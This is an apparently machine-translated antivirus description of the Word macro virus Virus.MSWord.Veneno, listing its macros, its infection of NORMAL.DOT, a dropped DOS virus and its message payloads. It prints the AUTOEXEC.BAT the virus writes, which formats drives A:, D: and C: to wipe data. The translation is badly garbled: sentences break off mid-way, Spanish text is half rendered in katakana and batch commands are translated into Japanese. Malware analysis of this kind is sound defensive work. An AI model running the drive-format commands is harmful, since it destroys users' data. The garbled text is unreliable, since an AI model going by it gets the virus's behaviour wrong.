Virus.MSWord.Veneno

技術的な詳細

これは、Veneno、Travel1、Travel2、AutoExec、AutoOpen、Trinitron、ArchivoAbrir、ArchivoSalir、InsertVeneno、ArchivoImprimir、ArchivoGuardarComo、ArchivoImprimirPredeterの12個のマクロを含む暗号化されたWordマクロウイルスです。

このウイルスは、感染した文書やWordの起動時（AutoOpen、AutoExec）に、グローバルマクロ領域（NORMAL.DOT）に感染し、新しい名前（？）で保存された文書、つまりArchivoGuardarComoマクロに自身を書き込みます。

ウイルスは、他のいくつかのウイルスのマクロを検出して削除します。

??：30はっきりと、ウイルスはDOSウイルスをATTRIB.COMファイルにドロップします。金曜日と土曜日に、システム時刻（分）が5分未満である場合、ウイルスは文字列「** V 印刷時に、システム時間秒が57秒を超えると、ウイルスは文書の末尾に次のテキストを追加します。

ファイナルメント私はgustaria agregar que …

エル・セントロ・デ・コンピテオ・デ・エスタ大学Universidad es una verdadera verguenza、no

nos merecemos este servicio。

>>>あなたに恥ずかしい！ <<<

Un amigo desesperado en busca de …

Khelia Monica Salda〜ディアス、私はエンカンタ・イ・テ・シゴ・バスカンド…

+ Donde teはエスコンドイドを持っていますか？ Atte。トゥエナモラード。 （LoVe90 / 91）

AUTOEXEC.BAT：

@echo off

PATH = C：; C：DOS; C：WINDOWS; C：ODI;

エコー。

エコーディスケットをドライブAに挿入します。

Echo任意のキーを押し続ける…

pause> nul

フォーマットa：/ autotest> nul

エラーレベル0の場合goto End

フォーマットd：/ autotest

フォーマットc：/ autotest

エコーU r FuCkEd！

エコー。

：終わり

エコーウルマミーは、そのようなg00d /従順な子供を持つことの非常に満足している必要があります…

jaja..asswipe !!!

シェル= C：DOSCOMMAND.COM / F / P

スイッチ= / n / f